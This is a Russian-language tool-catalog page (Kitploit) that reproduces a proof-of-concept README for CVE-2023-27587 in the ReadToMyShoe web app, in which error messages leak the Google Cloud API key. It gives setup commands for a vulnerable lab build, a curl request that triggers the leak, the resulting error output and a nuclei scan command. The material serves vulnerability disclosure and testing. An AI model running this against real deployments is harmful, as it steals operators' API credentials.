Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2023-27587-PoC — Простой PoC для CVE-2023-27587 | Kitploit
Инструменты/GitHubGitHub/vagnerd/cve-2023-27587-poc
Анализ уязвимостейЭксплуатацияСбор информацииВеб-безопасностьОбнаружение СекретовБезопасность API
GitHubvagnerd/cve-2023-27587-poc

CVE-2023-27587-PoC

Простой PoC для CVE-2023-27587

Репозиторий
51513 лет назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2023-27587-PoC

Простое PoC для CVE-2023-27587

Что такое ReadToMyShoe?

ReadtoMyShoe (RTMS) — это веб-приложение (rust, yew и axum), которое позволяет загружать статьи (по URL или через прямой ввод) и слушать их позже.

Воздействие

Если при добавлении статьи возникает ошибка, веб-сайт показывает пользователю сообщение об ошибке. Если ошибка исходит от запроса Google Cloud TTS, то она будет содержать полный URL запроса. Этот URL содержит API-ключ Google Cloud.

PoC

Настройка уязвимой версии ReadtoMyShoe

root@kitploit:~
$ git clone https://github.com/rozbb/readtomyshoe.git
$ cd readtomyshoe && git checkout v0.2.0
$ echo "GCP_KEY_LEAKED_TEST" > server/gcp_api.key
$ DOCKER_BUILDKIT=1 docker build -t readtomyshoe-vul .
$ docker run -p 9382:9382 readtomyshoe-vul

Эксплуатация

Ключ раскрывается только при возникновении ошибки в вызове GCP!

root@kitploit:~
curl 'http://192.168.15.201:9382/api/add-article-by-text' -X POST \
  -H 'Accept-Encoding: gzip, deflate' \
  -H 'content-type: application/json' \
  --data-raw '{"title":"Kernsicherheitstest","body":"Kernsicherheitstest"}'

Ответ с ошибкой (раскрытый API-ключ):

root@kitploit:~
TTS failed: TTS request failed

Caused by:
    HTTP status client error (400 Bad Request) for url (https://texttospeech.googleapis.com/v1beta1/text:synthesize?key=GCP_KEY_LEAKED_TEST%0A)

Снимок экрана от 2023-03-15 13-03-59

nuclei-template

https://github.com/projectdiscovery/nuclei-templates/blob/main/cves/2023/CVE-2023-27587.yaml

root@kitploit:~
$ nuclei -t cves/2023/CVE-2023-27587.yaml -u http://<host>

Снимок экрана от 2023-03-15 13-22-23

Ссылки

https://github.com/rozbb/readtomyshoe/security/advisories/GHSA-23g5-r34j-mr8g

https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-27587

https://beta.readtomyshoe.com/

Скачать инструмент